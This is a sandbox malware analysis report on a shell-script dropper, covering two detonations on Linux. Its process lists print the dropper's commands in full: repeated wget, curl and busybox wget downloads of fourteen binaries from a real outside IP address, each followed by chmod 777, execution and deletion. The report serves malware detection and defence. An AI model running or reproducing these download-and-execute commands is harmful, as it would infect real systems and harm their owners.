Malware Analysis Report

2025-04-03 19:45

Sample ID 241029-cs1lassfld
Target 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh
SHA256 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f
Tags defense_evasion discovery antivm
Score 7/10

Analysis Overview

score
7/10

SHA256

562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f

Threat Level: Shows suspicious behavior

The file 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 02:21

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

debian9-mipsel-20240226-en

Max time kernel

131s

Max time network

136s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

21s

Max time network

131s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

